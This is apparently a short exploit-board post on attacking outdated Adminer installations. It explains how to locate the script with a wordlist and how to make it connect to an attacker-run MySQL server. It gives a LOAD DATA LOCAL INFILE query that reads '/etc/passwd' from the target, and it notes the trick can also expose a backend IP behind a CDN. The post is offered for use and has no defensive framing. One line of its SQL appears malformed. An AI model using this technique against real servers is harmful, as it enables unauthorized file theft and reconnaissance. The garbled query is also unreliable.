S1 _

What it is and where to go

#00 SI9INT, 40 •

2019-05-04

This works only for versions < 4.6.3

An Adminer script can be discovered on a web-server by either using the following word-list (containing all official file-names since v.3.0.0) or searching for a renamed version, file-name e.g. "connect.php", HTTP-response body containing "<title>Login - Adminer</title>":
https://raw.githubusercontent.com/kaimi-io/web-fuzz-wordlists/master/adminer.txt The attack requires to setup a MySQL server with a public IP address, after that the external Adminer script can be used in combination with the owned IP address (instead of default value "localhost" ["Server" field]). Login and read local files:
LOAD DATA LOCAL INFILE '/etc/passwd'
INTO TABLE test.test
FIELDS TERMINATED BY "\n"
(test.test = table.row)
This kind of "back-connection" can also be used to expose a backend IP-address, bypassing a frontend proxy/CDN.


Greetz @YS | Source:
https://noreferrer.org/?https://twitter.com/spazef0rze/status/1086703365357273093
https://noreferrer.org/?https://medium.com/bugbountywriteup/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f